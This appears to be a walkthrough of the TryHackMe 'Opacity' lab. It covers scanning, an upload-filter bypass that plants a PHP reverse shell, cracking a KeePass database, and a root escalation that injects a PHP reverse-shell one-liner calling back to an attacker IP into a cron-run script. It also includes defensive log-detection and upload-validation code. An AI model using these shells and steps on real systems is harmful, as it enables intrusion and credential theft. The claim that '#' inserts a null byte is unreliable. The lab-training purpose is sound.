Opacity Room: A TryHackMe 101 Walkthrough

Sarmad Khursheed
10 min read · Mar 11, 2024


Opacity

Introduction:

Hey there, cyber explorers! Get pumped for a cool adventure in the Opacity Room on Try Hack Me. It’s set at an Easy difficulty level, so it’s just the right amount of challenge for anyone looking to boost their skills. Let’s dive in and have some fun!

Tools Used:

The Opacity room utilizes five essential tools for penetration testing:

  1. Nmap: A powerful network scanning tool that helps identify open ports, services, and vulnerabilities on a target machine.
  2. FFUF: A powerful open-source web fuzzing tool designed to rapidly discover hidden files and directories on web servers through customizable wordlists and filtering options.
  3. Netcat: A versatile utility for TCP/UDP data transfer, vital for tasks like port scanning, banner grabbing, and network troubleshooting in penetration testing and management.
  4. pspy64: A process-monitoring tool that, without needing root, reports the commands other users and cron jobs run on the system.
  5. John the Ripper: A digital locksmith for passwords, it’s like a master key used by ethical hackers and security pros to crack passwords and assess system security.

Our Goal:

Our goal in Opacity is to learn penetration testing with this beginner-friendly machine. Within it, we must locate two hash keys (user — local.txt and root — proof.txt) and use them to gain root access. Remember that there are multiple ways to achieve our objective, so let’s analyze the application’s behavior to find the best approach.

Step 1: Connecting With TryHackMe VPN

Browser

Before starting, ensure your Try Hack Me VPN is connected and working. If you need assistance with a VPN connection, refer to this article.

Step 2: Launch the Machine

Browser

Start the machine provided in the room and let it run for 3–4 minutes before proceeding. A box like the one below will appear, indicating that the machine is running and showing the IP address of the newly deployed machine.

Browser

Step 3: Ping the Machine

Linux Terminal

Ensure the machine is responsive by pinging it using the terminal of your Kali Linux machine.

Use the command: ping <Machine_IP>.

example:-

ping 10.10.159.222

If successful, proceed to the next step.

Step 4: Port Scanning with Nmap

Linux Terminal + Browser

Perform a thorough port scan using Nmap with the command: nmap -sV -p- -v <Machine_IP>.

example:-

nmap -sV -p- -v 10.10.159.222

Be patient; this may take some time. The flags serve the following purposes:

  • -v: Increase verbosity.
  • -sV: Service version detection.
  • -p-: Scan all ports.

Step 5: Analyzing Open Ports

Linux Terminal

We can now see the open ports and their services. Port 22 (SSH) is open, but without credentials it is of little use for now, so our focus shifts to port 80, where an HTTP service is running and is the most promising place to look for a way in.

Step 6: Accessing The Website

Browser

Access the web interface of port 80 in your browser using the URL format http://<Machine_IP>:80.

example:-

http://10.10.159.222:80

Step 7: Directory Busting with ffuf

Linux Terminal (ffuf)

In this step, we will conduct directory busting on the website using the ffuf tool. The chosen medium wordlist for directory busting is used with the following command:

ffuf -u http://10.10.159.222/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c

Be patient; this may take some time. The flags serve the following purposes:

  • -u http://10.10.159.222/FUZZ: Target URL for directory busting, with "FUZZ" as the placeholder that is replaced by each entry from the wordlist.
  • -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt: Path to the wordlist.
  • -c: Colorized output, which makes the results easier to read.

The outcomes of this directory busting will be analyzed in the subsequent steps.

Step 8: Analyzing ffuf Output

Linux Terminal (ffuf)

Upon executing the ffuf directory busting command, carefully examine the output to identify any discovered directories or files. We discovered a directory named "cloud." To explore further, we use it as an endpoint in the URL.
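From the defender's side, a wordlist scan like the one above leaves a very recognisable trail in the web server's access log: a burst of 404s from one client, with the occasional non-404 marking what the scanner actually found (here, /cloud). The following added example (not part of the original walkthrough) parses constructed Apache combined-format log lines, flags any client that produces many 404s inside a short window, and lists the paths that client did find; the log lines, IPs and threshold are assumptions for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log, modelled on a /FUZZ scan against the room's web server (not real data).
SAMPLE_LOG = """\
10.17.98.201 - - [11/Mar/2024:10:00:01 +0000] "GET /images HTTP/1.1" 404 196 "-" "Fuzz Faster U Fool v2.1.0"
10.17.98.201 - - [11/Mar/2024:10:00:01 +0000] "GET /download HTTP/1.1" 404 196 "-" "Fuzz Faster U Fool v2.1.0"
10.17.98.201 - - [11/Mar/2024:10:00:01 +0000] "GET /2006 HTTP/1.1" 404 196 "-" "Fuzz Faster U Fool v2.1.0"
10.17.98.201 - - [11/Mar/2024:10:00:02 +0000] "GET /news HTTP/1.1" 404 196 "-" "Fuzz Faster U Fool v2.1.0"
10.17.98.201 - - [11/Mar/2024:10:00:02 +0000] "GET /cloud HTTP/1.1" 301 312 "-" "Fuzz Faster U Fool v2.1.0"
10.17.98.201 - - [11/Mar/2024:10:00:02 +0000] "GET /crack HTTP/1.1" 404 196 "-" "Fuzz Faster U Fool v2.1.0"
192.168.1.50 - - [11/Mar/2024:10:00:05 +0000] "GET /cloud/ HTTP/1.1" 200 1540 "-" "Mozilla/5.0"
192.168.1.50 - - [11/Mar/2024:10:00:40 +0000] "GET /nope HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [ts] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Return (ip, timestamp, status, path) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, int(m["status"]), m["path"]

def find_scanners(log_text, window_s=10, threshold=5):
    """Map ip -> peak number of 404s seen inside any window_s-second window, for ips at or above threshold.
    A sliding window over the sorted 404 timestamps keeps this linear per client."""
    misses = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == 404:
            misses[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in misses.items():
        times.sort()
        left = 0
        for right, t in enumerate(times):
            while (t - times[left]).total_seconds() > window_s:
                left += 1
            if right - left + 1 >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), right - left + 1)
    return flagged

def found_paths(log_text, ip):
    """Paths the given client requested that did NOT 404: what the scan actually discovered."""
    return [r[3] for r in map(parse_line, log_text.splitlines()) if r and r[0] == ip and r[2] != 404]
```

The User-Agent is included only for realism; scanners can set any string, so the rate of misses is the signal worth alerting on.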

Linux Terminal + Browser

Inside the directory, we find a page that accepts file uploads via an external link, with a catch: only files with a PNG extension are allowed. We plan to get around this restriction by uploading a file that carries a PNG extension but contains a reverse shell script. The details follow in the upcoming steps.

Step 9: Obtaining a Reverse Shell from the Website

Given the ability to upload files via an external link to the website, a reverse shell can be obtained using the Pentestmonkey reverse shell PHP script. Download the script from this link.

PHP Reverse Shell Script

Before uploading the PHP script, make the necessary modifications by adding your IP address in the designated section (//Change This) within the script. Specify your IP, such as the Tryhackme VPN IP, and set the port to 1234.

Linux Terminal (netcat)

In a new terminal, start a listener by executing the following Netcat command:

nc -nvlp 1234

Linux Terminal + Browser

To upload our reverse shell script as an external link, we kick off a Python3 server on our local machine using the command:

python3 -m http.server 8000

With our server up and running (and the script in the directory it serves), we supply the following URL as the external link on the upload page, pointing at our own machine's VPN IP:

http://10.17.98.201:8000/php-reverse-shell.php#.png

The use of ‘#’ in the command incorporates a null byte, aiding us in bypassing the website’s .png file restriction.

Linux Terminal + Browser

Now, we patiently await the completion of the upload process. Once it’s done, we’ll gain a reverse shell. In the upcoming steps, we’ll make this shell interactive and navigate towards locating the local.txt flag.
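The upload form's weakness is that it decides "is this a PNG?" from how the submitted URL string ends. The added example below (written for this walkthrough, not code from the room) models that naive check next to a hardened one that parses the URL, discards the fragment and query, rejects NUL bytes, and then also verifies the fetched bytes carry the PNG signature; the `http://...#.png` string from above is used as one of the constructed inputs, and the fetched bodies are constructed too.

```python
import posixpath
from urllib.parse import urlparse

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"   # first 8 bytes of every PNG file
ALLOWED_EXT = {".png"}

def naive_extension_check(url: str) -> bool:
    """Assumed model of the vulnerable check: only looks at how the raw URL string ends,
    so anything followed by '#.png' passes."""
    return url.lower().endswith(".png")

def strict_extension_check(url: str) -> bool:
    """Hardened: reject NUL bytes, require http(s), and take the extension from the
    normalised path only, never from the query or fragment."""
    if "\x00" in url:
        return False
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    path = posixpath.normpath(parts.path)
    ext = posixpath.splitext(path)[1].lower()
    return ext in ALLOWED_EXT

def content_is_png(data: bytes) -> bool:
    """Second gate: the downloaded bytes must start with the PNG signature."""
    return data[:8] == PNG_MAGIC

def accept_upload(url: str, fetched: bytes) -> bool:
    """Accept only when both the URL's path extension and the content agree it is a PNG.
    'fetched' stands in for the body the server would download from the link."""
    return strict_extension_check(url) and content_is_png(fetched)

# Constructed inputs for a quick self-check.
BYPASS_URL = "http://10.17.98.201:8000/php-reverse-shell.php#.png"
REAL_PNG = PNG_MAGIC + b"\x00" * 16          # constructed: signature plus padding
NOT_PNG = b"<?php echo 'constructed'; ?>"    # constructed: plainly not an image
```

Storing the upload under a server-generated name and serving it with a fixed image Content-Type closes the remaining gap, since even a genuine PNG should never be executable.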

Step 10: Making the Shell Interactive

Linux Terminal

To make the shell interactive for improved navigation, execute the following commands sequentially:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo

These commands facilitate the transition to an interactive shell environment. Once these commands are executed, the shell becomes interactive. With an interactive shell, you can navigate through the system more efficiently. In the upcoming step, we will proceed to explore the machine further and locate the second key flag.

Step 11: Navigating The System

Linux Terminal

Now that we’ve made our shell interactive, navigating the machine becomes more manageable. To locate the local.txt flag, we head to the /home/sysadmin directory and attempt to view the contents of the local.txt file. Unfortunately, we get a “permission denied” error, signalling insufficient privileges.

Linux Terminal + Browser

To overcome this hurdle, we plan to switch our user context to sysadmin. However, we need the sysadmin’s password for this. During our system exploration, we uncovered a file named dataset.kdbx in /opt. To retrieve this file, we start a Python3 server on the victim’s system using the command:

python3 -m http.server 9001

To download the file, we open http://10.10.159.222:9001 in our browser and navigate to the /opt path. There, clicking dataset.kdbx starts the download. The subsequent steps show how we use this file to advance further.

Bonus Tip:

Linux Terminal + Browser

The password for the website can be found in a file named login.php located at /var/www/html on the system.

Browser

Feel free to explore the website, but you won’t find any useful information there.

Step 12: Cracking the dataset.kdbx File

Wondering what a .kdbx file is? It’s the database format of KeePass, a free and open-source password manager. KeePass stores passwords in a local database file, and opening it with the KeePass program requires the main password. Here’s where the vulnerability lies — by extracting the main password hash from the file, we can use brute force to crack it. Once successful, we can open the database and access all stored passwords.

Linux Terminal

Once we have the dataset.kdbx file on our system, the first step is to convert it into a hash file using the command:

keepass2john dataset.kdbx > Keepasshash.txt

Now, armed with the hash, we can proceed to crack it using the John the Ripper tool and the rockyou.txt wordlist with the following command:

john --wordlist=/usr/share/wordlists/rockyou.txt Keepasshash.txt

Upon successfully cracking the hash, we obtain the main password: 741852963.

KeePassXC

With this newfound knowledge, we can open the file in KeePassXC. After accessing the file, we discovered the password for the sysadmin user, which is Cl0udP4ss40p4city#8700.

To install KeePassXC on your system, run the following command:

sudo apt-get -y install keepassxc

Step 13: SSH with the New User and Obtaining the local.txt Flag

Linux Terminal

Recall that we discovered an open port 22 for SSH, but lacked the necessary credentials. Now armed with the sysadmin username and password obtained in the previous step, we can proceed to SSH into the system. Execute the following command:

ssh sysadmin@10.10.159.222

When prompted, enter the password obtained from the KeePassXC cracking step.

Linux Terminal

Upon successful login as sysadmin, navigate to the /home/sysadmin directory using the command:

cd /home/sysadmin

Now, let’s retrieve the local.txt flag by running:

cat local.txt

Congratulations! You’ve successfully retrieved the local.txt flag.

Step 14: Privilege Escalation and Retrieving the Final proof.txt Flag

To achieve privilege escalation, we’ll utilize a tool called pspy64. First, download the tool to your local machine.

Since our Python3 server is still running on port 8000 on our local machine, you can transfer the file to the victim’s system with the command:

wget 10.17.98.201:8000/pspy64

Ensure that the tool has the necessary permissions to run by executing:

chmod +x pspy64

Now, run the tool with:

./pspy64

Remember to navigate to the /tmp folder on the victim’s machine before executing these commands.

Linux Terminal (pspy64)

Upon running the tool, observe a cron job executing a script named script.php every minute.

Linux Terminal

Further examination reveals that script.php includes another script, backup.inc.php. We can exploit this by inserting a one-liner PHP reverse shell into backup.inc.php. The one-liner is:

$sock=fsockopen("10.17.98.201",9001);exec("sh <&3 >&3 2>&3");

Linux Terminal

As I tried to modify backup.inc.php, I got a permission error. So I copied the file to /tmp and put the reverse shell in that copy.

Use nano to modify the file: copy the reverse shell code and paste it into the script.

Nano

Save the file without changing its name and move it back to its original location. When asked whether you want to replace the existing file, answer “yes” so that the move succeeds.

Linux Terminal

Open a new terminal on your local system and initiate a new Netcat listener:

nc -nvlp 9001

Linux Terminal

Wait for the connection. Once established, use the whoami command to confirm that you now have root access. Navigate to the root directory with:

cd /root

Finally, retrieve the final proof.txt flag:

cat proof.txt

Congratulations! You’ve successfully escalated privileges and obtained the final proof.txt flag.

Conclusion:

In conclusion, our journey through the Opacity room on Try Hack Me has been a rewarding exercise in penetration testing. Starting with the creative exploitation of web vulnerabilities, we progressed by obtaining sysadmin credentials and escalating privileges. Key moments included identifying and leveraging a cronjob to gain root access. This hands-on experience equipped us with valuable skills, emphasizing the importance of creativity and persistence in ethical hacking. Opacity served as an excellent platform for practical application, contributing to our growth in the dynamic field of cybersecurity. The acquired insights and skills will undoubtedly prove beneficial in addressing future security challenges.

If you found this article insightful and informative, please consider following for more in-depth explorations and analyses in the realm of cybersecurity. Your support is greatly appreciated!

Written by Sarmad Khursheed

Cybersecurity Analyst | Web & Network Security | Developer | Penetration Tester | Vulnerability Hunter